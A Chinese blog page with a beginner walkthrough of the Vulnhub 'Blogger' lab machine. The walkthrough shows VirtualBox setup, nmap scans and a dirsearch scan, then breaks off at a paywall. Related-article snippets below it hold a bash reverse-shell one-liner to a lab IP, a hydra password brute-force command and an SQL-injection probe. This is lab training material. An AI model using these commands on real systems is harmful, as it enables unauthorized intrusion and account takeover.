靶机实战-blogger

最新推荐文章于 2025-03-08 23:16:49 发布
最新推荐文章于 2025-03-08 23:16:49 发布
阅读量4k 收藏 3
点赞数 2
分类专栏: 靶机 文件上传 文章标签: 网络安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_624/article/details/123968262
版权

靶机渗透 WordPress 权限提升 文件上传漏洞 反弹shell
关键词由CSDN通过智能技术生成

靶机实战 - blogger

1 介绍

难度: 初学者

描述:一位Web 开发人员 James M Brunner 最近创建了一个博客网站。他雇佣你来测试他博客网站的安全性。

目标: 拿到flag

2 环境搭建

由于靶机特点,需要搭建在VirtualBox ,所以在启动前配置网卡为桥接模式

  1. 双击 ova 文件导入 virtualBox,然后设置网卡模式

在这里插入图片描述

  1. 配置kali的网卡为 桥接模式

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dAIfyCOY-1649137170556)(靶机实战-blogger.assets/image-20220403222328401.png)]

靶机渗透

攻击机 kali Linux :192.168.31.106

  1. 主机发现

    nmap -sP 192.168.31.0/24 // 采用ping扫描存活主机

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tsSnGZUi-1649137170557)(靶机实战-blogger.assets/image-20220403223314018.png)]

    排除个人IP和已知网络IP后,存在一个异常IP地址: 192.168.31.73

  2. 进一步扫描 IP 地址开放的端口号

    nmap -sV -sT -p- 192.168.31.73 // -sV 探测端口服务版本 -sT 全连接 -p- 全端口

    扫描结束后,发现目标IP 开放了 2 个端口,SSH 可以采用爆破密码, HTTP服务可以通过常规 web 漏洞手段渗透,确认攻击方法后,优先挖掘 web 漏洞

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cPNAdaUf-1649137170558)(靶机实战-blogger.assets/image-20220403223801862.png)]

后续可能会遇到跳转到域名访问情况, 将 blogger.thm 添加到 /etc/hosts 文件 或 C:\Windows\System32\drivers\etc\hosts文件
在这里插入图片描述

  1. web 应用程序- 漏洞发现

    先进行目录爆破,使用工具 dirsearch 爆破路径

    命令: python dirsearch.py -u http://192.168.31.73/

最低0.47元/天 解锁文章
靶机渗透】BLOGGER: 1
weixin_47443077的博客
06-16 1130
靶机渗透】BLOGGER: 1 0x01靶机介绍 1.详情 链接: https://www.vulnhub.com/entry/blogger-1,675/ 2.描述 James M Brunner, A Web Developer has recently created a blog website. He hired you to test the Security of his Blog Website. Hack Your Way In Mr. Robot Style ???? 一位Web 开发
靶机实战-DC-6
滕财然的博客
03-03 917
DC-6靶机实战 文章目录DC-6靶机实战1、主机发现2、端口及端口详细信息扫描3、老规矩,访问web服务(80端口)4、提权 1、主机发现 2、端口及端口详细信息扫描 开放22、80端口 3、老规矩,访问web服务(80端口) 输入IP之后会变成http://wordy且找不到此网站 和以前一样,添加到hosts文件中//物理机和kali都添加 重新访问://这里我用的是火狐的一款插件...
靶机实战-zico
滕财然的博客
01-19 1277
zico靶机实战 1、主机发现 netdiscover: -i 指定网卡 -r 指定网段 2、端口扫描 目标开放了44929,22,111,80端口 3、扫描端口详细信息 22-ssh,80-http,111-rpcbind,44929-status 老规矩,干80端口 4、渗透80端口(http服务) 点击页面上可点击的按钮,找到一个有用的: 链接后面有?page= tools.htm...
靶机Lampiao入侵实战
最新发布
没有网络安全就没有国家安全
03-08 904
靶机Lampiao入侵实战
靶机渗透 blog
Anonymous
03-08 310
端口 访问 80 端口 目录扫描 在 /my_weblog 目录下 访问 README 发现是使用 nibbleblog 搭建的,4.0.3版本存在任意文件上传漏洞 需要使用到后台的账号密码 账号爆破 hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.0.134 http-post-form "/my_weblog/admin.php:username=admin&password=^PASS^:Incor..
靶机实战(billu)
weixin_45605313的博客
06-01 679
billu实验环境实验过程信息收集主机发现端口扫描目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机:billu 测试机:kali,win10 实验过程 信息收集 主机发现 靶机ip:192.168.238.157 端口扫描 端口:80 常见web漏洞 22 弱口令爆破 目录扫描 主页面:提示是有sql注入的 mysql后台登陆页面 漏洞发现 test 页面发现任意文件下载 找到phpmyadmin的配置文件var/www/phpmy/config.inc.php尝试(ssh,数据库
靶机实战-FristiLeaks
滕财然的博客
01-20 485
FristiLeaks靶机实战 文章目录FristiLeaks靶机实战1、主机发现2、端口扫描3、扫描端口详细信息4、访问http服务(80端口)5、获取反弹shell6、提权 1、主机发现 netdiscover -i eth0 -r 192.168.232.0/24 双网卡,147或148都可以用 2、端口扫描 masscan --rate=100000 -p 0-65535 192.168...
靶机实战:Funbox10
CHAsichuan的博客
06-14 2331
一次中等难度的靶机超详细版记录
靶机实战-Acid
滕财然的博客
01-26 932
Acid靶机实战 文章目录Acid靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问8080端口5、访问33447端口6、提权 1、主机发现 目标主机:192.168.232.160 我是用arp命令扫的,大家可自行选择 2、端口扫描 3、端口详细信息扫描 4、访问8080端口 只有一个文件,点击就会下载,先pass 5、访问33447端口 查看网页源代码: 发现一串16进制...
靶机实战-evilscience
滕财然的博客
01-28 786
evilscience靶机实战 文章目录evilscience靶机实战1、主机发现2、端口扫描3、端口详情扫描4、访问80端口5、提权方法一方法二 1、主机发现 目标IP:192.168.232.164 2、端口扫描 3、端口详情扫描 22端口–ssh、80端口–http 4、访问80端口 浏览网站,寻找有价值的信息 发现该网站有可能存在LFI(本地文件包含) 在about.php页面看...
vulnhub-CTF4靶机实战
御七彩虹猫
04-26 3364
Vulnhub-CTF4靶机实战
CTF6靶机实战.zip
05-25
CTF6靶机实战包括三部分: 1)靶机实战过程 2)文件上传的反弹shell文件(shell.php) 3)系统版本漏洞需要的文件(8478.sh)
VulnHub-DarkHole_2靶机实战(超详细保姆级教程)
精品博客,你值得一看~
08-13 6049
记得我们查看过9999端口运行的程序,当我们看到源代码的内容时,我们看到这允许远程命令执行。bash -c ‘bash -i >& /dev/tcp/192.168.184.156/9001 0>&1’ #记得修改你的IP。id=1' and 1=2 --+ #页面信息消失,说明id的闭合为单引号。到此,我们就可以进行ssh连接了.下面是拓展工具注入的方式.着急看结果的宝宝们可以直接移步下面的ssh连接步骤.
Vulnhub napping-1.0.1靶机攻击实战(一)
初学者
02-08 881
到这里,就算获得了root的权限了,那么这里有人会问,为什么我们拿到了daniel用户的权限,不直接通过这个用户提权反而是要通过adrian用户建立反射shell进行提权呢?这个问题有兴趣的读者可以深入研究一下。
Vulnhub: blogger:1靶机
qq_43884092的博客
08-03 754
wordpress插件任意文件上传漏洞,sudo提权
靶机实战-peixun-sever
滕财然的博客
01-25 427
peixun-sever靶机实战 文章目录peixun-sever靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问http服务(80端口)5、提权 1、主机发现 目标IP:192.168.232.135 2、端口扫描 开放22、80、8080端口 3、端口详细信息扫描 4、访问http服务(80端口) 熟悉的id=…试试有没有SQL注入 说明存在SQL注入,尝试SQL注入:...
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 2002
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
【内网渗透】记一次靶机实战
kali_Ma的博客
11-24 1746
靶机难度属于中等靶机水平,全文思路就是信息收集,使用nmap或者masscan进行端口扫描,访问web页面,发现提示,接着使用wfuzz进行指定路径fuzz。然后找到py脚本,接着进行脚本分析,发现脚本存在的漏洞。构造poc然后进行反弹shell,反弹shell之后,发现存在另一个新的脚本,存在密码加密方式和密码本。进行解密,解密之后使用ssh进行远程登录。使用sudo -l发现xx路径下的python脚本拥有root权限,接着进行移动该目录写入提权语法成功提权。
靶机实战-DC-1
滕财然的博客
01-30 1035
DC-1靶机实战 文章目录DC-1靶机实战1、主机发现2、端口扫描3、端口详细信息扫描4、访问80端口 1、主机发现 优点是快,但不能跨网段 2、端口扫描 3、端口详细信息扫描 4、访问80端口 发现网站使用Drupal cms管理系统而且是drupal 7 用msf去找drupal 7的漏洞利用: 使用最新的漏洞尝试攻击 拿到shell//先看权限,权限不够就提权 使用python...
vulnhub靶机AI-WEB1
01-19
### 关于VulnHub靶机AI-WEB1的信息 针对VulnHub平台上的AI-WEB1靶机,该虚拟机旨在提供给有兴趣了解Web应用程序安全性的个人一种实践环境。通过这一挑战,参与者可以探索常见的Web应用漏洞以及如何利用这些弱点来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值